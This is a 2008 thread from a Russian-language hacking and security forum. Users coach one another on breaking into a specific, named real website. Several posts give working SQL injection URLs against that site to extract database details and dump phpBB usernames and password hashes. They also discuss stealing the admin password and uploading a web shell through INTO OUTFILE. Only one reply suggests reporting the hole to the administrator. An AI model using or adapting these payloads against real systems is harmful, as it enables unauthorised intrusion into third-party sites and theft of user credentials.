ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.08.2008, 12:27
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
это в каком сообщение 1 или 2?)
|
|
|
12.08.2008, 12:33
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Ко второму.
К первому нужны права на чтение файлов.
|
|
|
|
12.08.2008, 12:35
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.
|
|
|
|
12.08.2008, 13:49
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
Сообщение от superboys
ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.
можно узнать пароль админа на форуме
потом через форум можно залить шелл .. и будет тебе счастье :)
попробуй такие идеи
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*
это для технической информации
также можешь узнать пароль и имена пользователей
таблица
phpbb_users
поля
username
user_password
|
|
|
|
12.08.2008, 15:18
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
Сообщение от nicusor
можно узнать пароль админа на форуме
потом через форум можно залить шелл .. и будет тебе счастье 
попробуй такие идеи
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*
это для технической информации
также можешь узнать пароль и имена пользователей
таблица
phpbb_users
поля
username
user_password по твоей подсказке сделал такой запрос http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+s elect+1,2,3,4,username,user_password,7,8,9+from+ph pbb_users/* но почемут не видно данных базы.
|
|
|
|
12.08.2008, 15:34
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
Сообщение от superboys
по твоей подсказке сделал такой запрос http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+s elect+1,2,3,4,username,user_password,7,8,9+from+ph pbb_users/* но почемут не видно данных базы.
hex, aes_encrypt
|
|
|
|
12.08.2008, 12:42
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Оставь как есть или напиши администратору о дырке.
|
|
|
|
12.08.2008, 13:50
|
|
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332
Репутация:
15
|
|
может кто показать , как заливают фаил через load_file() в скл инъекции .
|
|
|
|
12.08.2008, 13:56
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Вот отличная статья, там все написано https://forum.antichat.ru/showthread.php?t=19605
Смотри пункт
4)Получить шелл
Ах да, файл НЕ заливают через LOAD_FILE() его читают. А заливают через into+outfile+'/ПУТЬ/ИМЯ_ФАЙЛА'
Последний раз редактировалось Red_Red1; 12.08.2008 в 13:58..
Причина: Уточнение
|
|
|
|
12.08.2008, 14:29
|
|
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332
Репутация:
15
|
|
Сообщение от Red_Red1
Вот отличная статья, там все написано https://forum.antichat.ru/showthread.php?t=19605
Смотри пункт
4)Получить шелл
Ах да, файл НЕ заливают через LOAD_FILE() его читают. А заливают через into+outfile+'/ПУТЬ/ИМЯ_ФАЙЛА'
спасибо , почитаю.
А ИМЯ_ФАЙЛА(путь) на моем компе , или на его? и заливается , то куда?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид